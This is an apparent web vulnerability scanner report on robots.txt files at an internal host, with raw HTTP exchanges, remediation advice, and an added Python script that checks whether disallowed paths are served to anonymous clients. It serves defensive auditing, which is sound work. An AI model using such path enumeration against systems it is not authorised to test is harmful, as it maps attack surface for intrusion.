The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site that robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.

The port-81 file in this report illustrates the point: it lists phpinfo.php and server-status, both of which section 3.11 shows being served to an unauthenticated client, and sys-test.php, which carries the OS command injection reported in section 1.1. Listing them in robots.txt only hands an attacker the map.
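An added example, not from the report: a robots.txt parser and a check that requests each Disallow path as an anonymous client and reports the ones the server serves anyway, which is the test that separates a harmless hint from the serious case the background describes. It runs offline against the port-81 file recorded below and a constructed status table; only the /phpinfo.php and /server-status statuses reflect responses shown in this report, the rest are made up. http_status is a plain urllib fetcher for a live run; the function names are this example's own.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple


def parse_robots(text: str, agent: str = "*") -> Dict[str, List[str]]:
    """Return the Allow/Disallow rules of the group whose User-agent line
    matches `agent` (case-insensitive exact match); empty rules if none does.
    Consecutive User-agent lines share one group, as in RFC 9309."""
    groups = []
    agents: List[str] = []
    rules: Dict[str, List[str]] = {"allow": [], "disallow": []}
    previous_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not previous_was_agent and (agents or rules["allow"] or rules["disallow"]):
                groups.append((agents, rules))    # a new group starts here
                agents, rules = [], {"allow": [], "disallow": []}
            agents.append(value.lower())
            previous_was_agent = True
        elif field in ("allow", "disallow"):
            if value:                             # a bare "Disallow:" means nothing
                rules[field].append(value)
            previous_was_agent = False
    if agents or rules["allow"] or rules["disallow"]:
        groups.append((agents, rules))
    for group_agents, group_rules in groups:
        if agent.lower() in group_agents:
            return group_rules
    return {"allow": [], "disallow": []}


def audit_disallowed(base: str, disallow: Iterable[str],
                     fetch: Callable[[str], int]) -> List[Tuple[str, int]]:
    """Request every Disallow path as an anonymous client and return the ones
    the server actually serves (2xx). Those are reachable regardless of
    robots.txt and need real access control or removal."""
    exposed = []
    for path in disallow:
        status = fetch(urllib.parse.urljoin(base, path))
        if 200 <= status < 300:
            exposed.append((path, status))
    return exposed


def http_status(url: str, timeout: float = 5.0) -> int:
    """Fetcher for a live run: plain GET, no cookies, status code only."""
    req = urllib.request.Request(url, headers={"User-Agent": "robots-audit/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


# The port-81 robots.txt from this report.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /user/
Disallow: /search
Disallow: /config.php
Disallow: /phpinfo.php
Disallow: /session.php
Disallow: /sys-test.php
Disallow: /sys2_test.php
Disallow: /server-status
"""

# Constructed status table standing in for the live server. Only /phpinfo.php
# and /server-status reflect responses shown in this report (200 to an
# access_level=0 client); every other entry is made up for the example.
CONSTRUCTED_STATUSES = {
    "/user/": 200, "/search": 200, "/config.php": 403, "/phpinfo.php": 200,
    "/session.php": 302, "/sys-test.php": 200, "/sys2_test.php": 404,
    "/server-status": 200,
}


def fake_fetch(url: str) -> int:
    """Offline stand-in for http_status, keyed on the URL path."""
    return CONSTRUCTED_STATUSES.get(urllib.parse.urlsplit(url).path, 404)


if __name__ == "__main__":
    rules = parse_robots(SAMPLE_ROBOTS)
    for path, status in audit_disallowed("http://10.250.200.5:81/", rules["disallow"], fake_fetch):
        print(f"{path} is disallowed in robots.txt but served: HTTP {status}")
```

For a live target replace fake_fetch with http_status; a 2xx without a session cookie means the path is protected by nothing but the file that advertises it.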



3.12.1. http://10.250.200.5/robots.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
3.12.2. http://10.250.200.5:81/robots.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5
Connection: close

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:47:26 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 190
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /user/
Disallow: /search
Disallow: /config.php
Disallow: /phpinfo.php
Disallow: /session.php
Disallow: /sys-test.php
Disallow: /sys2_test.php
Disallow: /server-status

Report generated by Burp Scanner v1.7.13, at Wed Nov 08 13:46:47 CET 2017.